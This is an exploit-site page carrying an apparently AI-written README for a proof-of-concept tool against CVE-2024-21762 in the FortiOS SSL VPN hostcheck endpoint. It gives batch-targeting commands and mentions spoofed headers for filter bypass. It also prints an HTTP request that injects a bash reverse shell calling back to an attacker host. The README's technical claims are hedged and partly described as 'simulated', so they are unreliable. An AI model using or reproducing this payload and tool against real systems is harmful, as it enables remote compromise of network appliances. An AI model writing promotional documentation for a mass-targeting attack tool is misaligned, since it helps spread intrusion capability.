Share
## https://sploitus.com/exploit?id=2D78F8DD-AC60-50A2-9D10-FB6E4E4E3867
# CVE-2024-21762_FortiNet_PoC
Proof-of-concept scanner targeting CVE-2024-21762 in FortiOS SSL VPNโ€™s /remote/hostcheck_validate endpoint with reverse shell payload delivery.


Hereโ€™s a **GitHub-style writeup** for your project, including a clean and concise summary, a usage guide, and context on how it fits with the CVE.

---

## ๐Ÿ”ฅ Project Title: `CVE-2024-21762 FortiOS HostCheck PoC Scanner`

### ๐Ÿง  Summary (for GitHub description line):

> Proof-of-concept scanner targeting CVE-2024-21762 in FortiOS SSL VPNโ€™s `/remote/hostcheck_validate` endpoint with reverse shell payload delivery.

---

## ๐Ÿ“œ Overview

This Python script is a PoC (Proof of Concept) tool designed to **interact with Fortinetโ€™s FortiOS SSL VPN interface**, targeting **CVE-2024-21762** โ€” a stack-based buffer overflow or command injection vulnerability in the `/remote/hostcheck_validate` endpoint.

> **Disclaimer**: This is for educational and authorized testing purposes only.

---

## ๐Ÿงฌ How It Works

* Sends a crafted POST request to `/remote/hostcheck_validate` on a FortiGate SSL VPN interface.
* Injects a **bash reverse shell payload** in a simulated vulnerable parameter (`host`).
* Uses spoofed headers (`User-Agent`, `Cookie`) to bypass superficial FortiOS request filtering.
* Receives and logs server responses to assess exploitation success.
* Supports **single** or **batch** target testing with file input/output automation and progress bars.

---

## ๐Ÿ› ๏ธ Features

* ๐Ÿงช Reverse shell payload injection via controlled form field
* ๐Ÿงพ Full HTTP response capture for analysis (`last_response.txt`)
* ๐Ÿ“Š Progress bar for tracking in single/batch mode
* ๐Ÿ—ƒ๏ธ Batch mode with input/output file support
* ๐Ÿ”„ Modular and extendable

---

## โš™๏ธ Requirements

* Python 3.6+
* `tqdm` for progress visualization

Install dependencies:

```bash
pip install tqdm
```

---

## ๐Ÿš€ Usage

### Single Target Mode

```bash
python3 exploit.py --target 192.168.1.1:443 --callback-ip YOUR_IP --callback-port 8080
```

### Batch Mode

```bash
python3 exploit.py --input targets.txt --output results.txt --callback-ip YOUR_IP --callback-port 8080
```

* `targets.txt`: List of targets in `IP:PORT` format, one per line
* `results.txt`: Output log of exploit attempts

---

## ๐Ÿ“ฅ Example Payload Sent

```
POST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded

host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...
```

---

## ๐Ÿ” Logs

The tool writes the full HTTP response of each attempt to:

```text
last_response.txt
```

Use this to verify if the request was parsed, rejected, or if an error code was returned.

---

## โš ๏ธ Legal

This code is provided **for educational and authorized testing purposes only**. Do not use this on networks or systems you do not own or have explicit permission to test.

---

## โœ๏ธ Author

Carter โ€” Cybersecurity Engineer, Red/Purple Team enthusiast, PoC automation nerd.

---

Would you like this packaged into a `README.md` file + repo structure ready to push to GitHub? I can generate that next.